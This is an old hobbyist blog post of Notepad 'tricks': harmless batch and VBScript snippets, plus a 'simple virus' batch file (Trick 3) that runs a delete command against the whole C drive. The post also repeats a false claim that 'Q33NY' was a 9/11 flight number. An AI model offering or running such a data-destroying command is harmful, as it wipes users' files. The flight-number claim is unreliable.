Friday, May 16, 2014

Top Notepad Tricks

Notepad is one of the best platform for editing the text, anything can be written with any type of extension, Today i will share some most useful and interesting tricks of notepad.


Trick 1:

This trick is called Matrix effect trick.
  • First Open a Notepad.
  • Now copy and paste the following code.

@echo off
color 0a
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start

  • Now save the file with .bat extension type.
  • Run the .bat file,Then you will have matrix Effect on your screen.


Trick 2:

This trick is called Keyboard Dancing Led.
  • First Open a Notepad.
  • Now cop and paste the following code.

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop


  • Now save the file name as dance.vbs (where vbs is an extension you must include).
  • Run the dance.vbs file then you can see your keyboard lights are blinking like dancing.

How to Stop this.

  • First go to task manager(ctrl+alt+del).
  • Now exit the program named wscript.

Trick 3:

Make a simple virus, this is very dangerous trick, if you open this file you may lose all files from C drive or any specified Drive below (don't do this).
  • First open a Notepad.
  • Now copy and paste the following code.

@Echo off
Del C:\ *.* |y


  • Now save the file name as virus.bat (.bat is an extension, you must include).

Trick 4:

This is World trade center attack trick. The flight number of the plane that had hit World Trade Center on  (9/11) was Q33NY, Coincidentally it has become an amazing trick.
  • First Open a Notepad.
  • Now Copy and paste the following text.

Q33N
  • Now change the font size to 72 and font to wingdings.

Other tricks will be added soon So, keep visiting.

No comments:

Post a Comment